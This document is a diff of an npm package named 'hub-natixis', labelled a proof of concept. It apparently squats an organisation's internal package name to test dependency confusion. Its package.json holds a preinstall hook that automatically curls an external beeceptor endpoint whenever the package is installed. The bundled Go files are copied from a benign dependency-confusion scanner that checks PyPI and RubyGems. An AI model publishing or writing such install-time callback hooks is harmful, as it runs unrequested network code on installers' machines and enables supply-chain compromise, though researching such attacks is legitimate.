hub-natixis 1.0.1

package/package.json

@@ -0,0 +1,20 @@
+{
+  "name": "hub-natixis",
+  "version": "1.0.1",
+  "description": "poc by foysal1197",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "curl https://ase33.free.beeceptor.com"
+  },
+  "repository": {
+    "type": "git",
+    "url": "git+https://github.com/visma-prodsec/confused.git"
+  },
+  "author": "",
+  "license": "ISC",
+  "bugs": {
+    "url": "https://github.com/visma-prodsec/confused/issues"
+  },
+  "homepage": "https://github.com/visma-prodsec/confused#readme"
+}

package/pip.go

@@ -0,0 +1,99 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+)
+
+// PythonLookup represents a collection of python packages to be tested for dependency confusion.
+type PythonLookup struct {
+	Packages []string
+	Verbose  bool
+}
+
+// NewPythonLookup constructs a `PythonLookup` struct and returns it
+func NewPythonLookup(verbose bool) PackageResolver {
+	return &PythonLookup{Packages: []string{}, Verbose: verbose}
+}
+
+// ReadPackagesFromFile reads package information from a python `requirements.txt` file
+//
+// Returns any errors encountered
+func (p *PythonLookup) ReadPackagesFromFile(filename string) error {
+	rawfile, err := ioutil.ReadFile(filename)
+	if err != nil {
+		return err
+	}
+	line := ""
+	for _, l := range strings.Split(string(rawfile), "\n") {
+		l = strings.TrimSpace(l)
+		if strings.HasPrefix(l, "#") {
+			continue
+		}
+		if len(l) > 0 {
+			// Support line continuation
+			if strings.HasSuffix(l, "\\") {
+				line += l[:len(l) - 1]
+				continue
+			}
+			line += l
+			pkgrow := strings.FieldsFunc(line, p.pipSplit)
+			if len(pkgrow) > 0 {
+				p.Packages = append(p.Packages, strings.TrimSpace(pkgrow[0]))
+			}
+			// reset the line variable
+			line = ""
+		}
+	}
+	return nil
+}
+
+// PackagesNotInPublic determines if a python package does not exist in the pypi package repository.
+//
+// Returns a slice of strings with any python packages not in the pypi package repository
+func (p *PythonLookup) PackagesNotInPublic() []string {
+	notavail := []string{}
+	for _, pkg := range p.Packages {
+		if !p.isAvailableInPublic(pkg) {
+			notavail = append(notavail, pkg)
+		}
+	}
+	return notavail
+}
+
+func (p *PythonLookup) pipSplit(r rune) bool {
+	delims := []rune{
+		'=',
+		'<',
+		'>',
+		'!',
+		' ',
+		'~',
+		'#',
+		'[',
+	}
+	return inSlice(r, delims)
+}
+
+// isAvailableInPublic determines if a python package exists in the pypi package repository.
+//
+// Returns true if the package exists in the pypi package repository.
+func (p *PythonLookup) isAvailableInPublic(pkgname string) bool {
+	if p.Verbose {
+		fmt.Print("Checking: https://pypi.org/project/" + pkgname + "/ : ")
+	}
+	resp, err := http.Get("https://pypi.org/project/" + pkgname + "/")
+	if err != nil {
+		fmt.Printf(" [W] Error when trying to request https://pypi.org/project/"+pkgname+"/ : %s\n", err)
+		return false
+	}
+	if p.Verbose {
+		fmt.Printf("%s\n", resp.Status)
+	}
+	if resp.StatusCode == http.StatusOK {
+		return true
+	}
+	return false
+}

package/rubygems.go

@@ -0,0 +1,149 @@
+package main
+
+import (
+	"bufio"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"os"
+	"strings"
+	"time"
+)
+
+type Gem struct {
+	Remote       string
+	IsLocal      bool
+	IsRubyGems   bool
+	IsTransitive bool
+	Name         string
+	Version      string
+}
+
+type RubyGemsResponse struct {
+	Name      string `json:"name"`
+	Downloads int64  `json:"downloads"`
+	Version   string `json:"version"`
+}
+
+// RubyGemsLookup represents a collection of rubygems packages to be tested for dependency confusion.
+type RubyGemsLookup struct {
+	Packages []Gem
+	Verbose  bool
+}
+
+// NewRubyGemsLookup constructs an `RubyGemsLookup` struct and returns it.
+func NewRubyGemsLookup(verbose bool) PackageResolver {
+	return &RubyGemsLookup{Packages: []Gem{}, Verbose: verbose}
+}
+
+// ReadPackagesFromFile reads package information from a Gemfile.lock file
+//
+// Returns any errors encountered
+func (r *RubyGemsLookup) ReadPackagesFromFile(filename string) error {
+	file, err := os.Open(filename)
+	if err != nil {
+		return err
+	}
+	defer file.Close()
+	scanner := bufio.NewScanner(file)
+	var remote string
+	for scanner.Scan() {
+		line := scanner.Text()
+		trimmedLine := strings.TrimSpace(line)
+		if strings.HasPrefix(trimmedLine, "remote:") {
+			remote = strings.TrimSpace(strings.SplitN(trimmedLine, ":", 2)[1])
+		} else if trimmedLine == "revision:" {
+			continue
+		} else if trimmedLine == "branch:" {
+			continue
+		} else if trimmedLine == "GIT" {
+			continue
+		} else if trimmedLine == "GEM" {
+			continue
+		} else if trimmedLine == "PATH" {
+			continue
+		} else if trimmedLine == "PLATFORMS" {
+			break
+		} else if trimmedLine == "specs:" {
+			continue
+		} else if len(trimmedLine) > 0 {
+			parts := strings.SplitN(trimmedLine, " ", 2)
+			name := strings.TrimSpace(parts[0])
+			var version string
+			if len(parts) > 1 {
+				version = strings.TrimRight(strings.TrimLeft(parts[1], "("), ")")
+			} else {
+				version = ""
+			}
+			r.Packages = append(r.Packages, Gem{
+				Remote:       remote,
+				IsLocal:      !strings.HasPrefix(remote, "http"),
+				IsRubyGems:   strings.HasPrefix(remote, "https://rubygems.org"),
+				IsTransitive: countLeadingSpaces(line) == 6,
+				Name:         name,
+				Version:      version,
+			})
+		} else {
+			continue
+		}
+	}
+	return nil
+}
+
+// PackagesNotInPublic determines if a rubygems package does not exist in the public rubygems package repository.
+//
+// Returns a slice of strings with any rubygem packages not in the public rubygems package repository
+func (r *RubyGemsLookup) PackagesNotInPublic() []string {
+	notavail := []string{}
+	for _, pkg := range r.Packages {
+		if pkg.IsLocal || !pkg.IsRubyGems {
+			continue
+		}
+		if !r.isAvailableInPublic(pkg.Name, 0) {
+			notavail = append(notavail, pkg.Name)
+		}
+	}
+	return notavail
+}
+
+// isAvailableInPublic determines if a rubygems package exists in the public rubygems.org package repository.
+//
+// Returns true if the package exists in the public rubygems package repository.
+func (r *RubyGemsLookup) isAvailableInPublic(pkgname string, retry int) bool {
+	if retry > 3 {
+		fmt.Printf(" [W] Maximum number of retries exhausted for package: %s\n", pkgname)
+		return false
+	}
+	url := fmt.Sprintf("https://rubygems.org/api/v1/gems/%s.json", pkgname)
+	if r.Verbose {
+		fmt.Printf("Checking: %s : \n", url)
+	}
+	resp, err := http.Get(url)
+	if err != nil {
+		fmt.Printf(" [W] Error when trying to request %s: %s\n", url, err)
+		return false
+	}
+	defer resp.Body.Close()
+	if r.Verbose {
+		fmt.Printf("%s\n", resp.Status)
+	}
+	if resp.StatusCode == http.StatusOK {
+		rubygemsResp := RubyGemsResponse{}
+		body, _ := ioutil.ReadAll(resp.Body)
+		err = json.Unmarshal(body, &rubygemsResp)
+		if err != nil {
+			// This shouldn't ever happen because if it doesn't return JSON, it likely has returned
+			// a non-200 status code.
+			fmt.Printf(" [W] Error when trying to unmarshal response from %s: %s\n", url, err)
+			return false
+		}
+		return true
+	} else if resp.StatusCode == 429 {
+		fmt.Printf(" [!] Server responded with 429 (Too many requests), throttling and retrying...\n")
+		time.Sleep(10 * time.Second)
+		retry = retry + 1
+		return r.isAvailableInPublic(pkgname, retry)
+	}
+	return false
+}

package/util.go

@@ -0,0 +1,16 @@
+package main
+
+import "strings"
+
+func inSlice(what rune, where []rune) bool {
+	for _, r := range where {
+		if r == what {
+			return true
+		}
+	}
+	return false
+}
+
+func countLeadingSpaces(line string) int {
+	return len(line) - len(strings.TrimLeft(line, " "))
+}